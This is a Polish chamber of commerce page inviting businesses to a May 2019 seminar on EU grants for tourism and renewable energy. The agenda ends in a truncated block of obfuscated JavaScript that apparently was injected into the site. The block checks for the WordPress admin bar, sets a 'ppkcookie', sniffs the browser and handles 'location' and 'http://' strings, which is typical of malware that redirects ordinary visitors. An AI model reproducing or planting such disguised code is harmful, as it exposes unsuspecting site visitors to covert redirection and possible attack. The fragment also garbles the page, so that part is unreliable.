Spotkanie „Bezzwrotne dotacje UE 2014-2020 dla innowacyjnych inwestycji przedsiębiorstw w sektor turystyczny i odnawialnych źródeł energii” | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo!

Razem z firmą Europrojekty Consulting Sp. z o.o. Członkiem Północnej Izby Gospodarczej w Koszalinie zapraszamy na spotkanie pt. Bezzwrotne dotacje UE 2014-2020 dla innowacyjnych inwestycji przedsiębiorstw w sektor turystyczny i odnawialnych źródeł energii.

Miejsce: Północna Izba Gospodarcza w Koszalinie, ul. Racławicka 15-17 F
Data: 29 maja 2019 r. (środa) godz. 11:00-13:30

Zgłoszenia prosimy kierować telefonicznie pod nr 537 184 630 lub mailowo na koszalin@izba.info. Ilość miejsc jest ograniczona.

BEZZWROTNE DOTACJE UE 2014-2020 DLA INNOWACYJNYCH INWESTYCJI PRZEDSIĘBIORSTW W SEKTOR TURYSTYCZNY
I ODNAWIALNYCH ŹRÓDEŁ ENERGII”

 Prowadzący: Piotr Ostrowski – Prezes zarządu Europrojekty Consulting Sp. z o.o.

godz.  Temat
                                     OTWARCIE, PRZYWITANIE UCZESTNIKÓW
11.00

 11.30

 ·         Przywitanie Gości.

·         Informacje ogólne – Regionalny Program Operacyjny Województwa       Zachodniopomorskiego 2014-2020.

·         Cele i priorytety bieżących konkursów o dotacje unijne.

11.30    Przerwa kawowa

CHARAKTERYSTYKA DOTACJI DLA INWESTYCJI

PRAKTYCZNA PROCEDURA PRZYGOTOWANIA DOKUMENTACJI
WNIOSKUJĄCEJ O DOFINANSOWANIE

11.45

13.00

 Koszty kwalifikujące się do objęcia wsparciem w ramach RPO WZ 1.5 – sektor turystyczny oraz RPO WZ 2.10 – sektor odnawialnych źródeł energii

·         Rodzaje kosztów niekwalifikowanych;

·         Kryteria niezbędne do osiągnięcia dofinansowania dotacyjnego;

·         Wysokość dofinansowania i terminy składania wniosków.

 

RODZAJE INWESTYCJI W RAMACH DOTACJI UE

13.00

14.00

 ·         Szczegółowe omówienie przygotowania wniosku o dofinansowanie;

·         Rodzaje inwestycji podlegających dofinansowaniu;

·         Omówienie niezbędnych załączników do dokumentacji;

·         Procedura oceny wniosków oraz najczęstsze błędy popełniane w trakcie przygotowania dokumentacji;

·         Wymagane dokumenty i procedura rozliczenia projektów

·         Konsultacje indywidualne.

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m